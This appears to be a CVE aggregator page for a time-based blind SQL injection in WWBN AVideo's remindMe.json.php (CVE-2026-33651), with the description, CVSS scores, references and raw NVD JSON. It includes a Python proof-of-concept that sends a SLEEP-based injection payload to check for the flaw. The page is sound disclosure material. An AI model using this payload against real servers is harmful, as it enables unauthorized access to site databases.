CVE-2026-33651

Description

WWBN AVideo is an open source video platform. In versions up to and including 26.0, the `remindMe.json.php` endpoint passes `$_REQUEST['live_schedule_id']` through multiple functions without sanitization until it reaches `Scheduler_commands::getAllActiveOrToRepeat()`, which directly concatenates it into a SQL `LIKE` clause. Although intermediate functions (`new Live_schedule()`, `getUsers_idOrCompany()`) apply `intval()` internally, they do so on local copies within `ObjectYPT::getFromDb()`, leaving the original tainted variable unchanged. Any authenticated user can perform time-based blind SQL injection to extract arbitrary database contents. Commit 75d45780728294ededa1e3f842f95295d3e7d144 contains a patch.

CVSS Details

CVSS Score

8.1

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:* - VULNERABLE

WWBN AVideo <= 26.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import time

def check_sqli(url, cookies):
    # The vulnerable parameter is live_schedule_id
    # Payload for time-based blind SQL injection
    payload = {
        'live_schedule_id': "1' AND IF(1=1, SLEEP(5), 0)-- -"
    }
    target_url = f"{url}/remindMe.json.php"
    
    try:
        start_time = time.time()
        response = requests.get(target_url, params=payload, cookies=cookies, timeout=10)
        end_time = time.time()
        
        # Check if the response time indicates the sleep was executed
        if end_time - start_time >= 5:
            print("[+] Vulnerable to SQL Injection!")
        else:
            print("[-] Not vulnerable or payload failed.")
    except Exception as e:
        print(f"Error: {e}")

# Usage example
# url = "http://target-site"
# cookies = {'PHPSESSID': 'authenticated_session_id'}
# check_sqli(url, cookies)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-33651
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-33651
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-33651/
[4] VulDB https://vuldb.com/cve/CVE-2026-33651
[5] https://github.com/WWBN/AVideo/commit/75d45780728294ededa1e3f842f95295d3e7d144
[6] https://github.com/WWBN/AVideo/security/advisories/GHSA-pvw4-p2jm-chjm

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-33651", "sourceIdentifier": "[email protected]", "published": "2026-03-23T19:16:41.383", "lastModified": "2026-03-25T18:02:12.427", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "WWBN AVideo is an open source video platform. In versions up to and including 26.0, the `remindMe.json.php` endpoint passes `$_REQUEST['live_schedule_id']` through multiple functions without sanitization until it reaches `Scheduler_commands::getAllActiveOrToRepeat()`, which directly concatenates it into a SQL `LIKE` clause. Although intermediate functions (`new Live_schedule()`, `getUsers_idOrCompany()`) apply `intval()` internally, they do so on local copies within `ObjectYPT::getFromDb()`, leaving the original tainted variable unchanged. Any authenticated user can perform time-based blind SQL injection to extract arbitrary database contents. Commit 75d45780728294ededa1e3f842f95295d3e7d144 contains a patch."}, {"lang": "es", "value": "WWBN AVideo es una plataforma de video de código abierto. En versiones hasta la 26.0 inclusive, el endpoint 'remindMe.json.php' pasa '$_REQUEST['live_schedule_id']' a través de múltiples funciones sin sanitización hasta que llega a 'Scheduler_commands::getAllActiveOrToRepeat()', que lo concatena directamente en una cláusula SQL 'LIKE'. Aunque las funciones intermedias ('new Live_schedule()', 'getUsers_idOrCompany()') aplican 'intval()' internamente, lo hacen en copias locales dentro de 'ObjectYPT::getFromDb()', dejando la variable original contaminada sin cambios. Cualquier usuario autenticado puede realizar una inyección SQL ciega basada en tiempo para extraer contenido arbitrario de la base de datos. El commit 75d45780728294ededa1e3f842f95295d3e7d144 contiene un parche."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*", "versionEndIncluding": "26.0", "matchCriteriaId": "774C24F1-9D26-484F-B931-1DA107C8F588"}]}]}], "references": [{"url": "https://github.com/WWBN/AVideo/commit/75d45780728294ededa1e3f842f95295d3e7d144", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-pvw4-p2jm-chjm", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}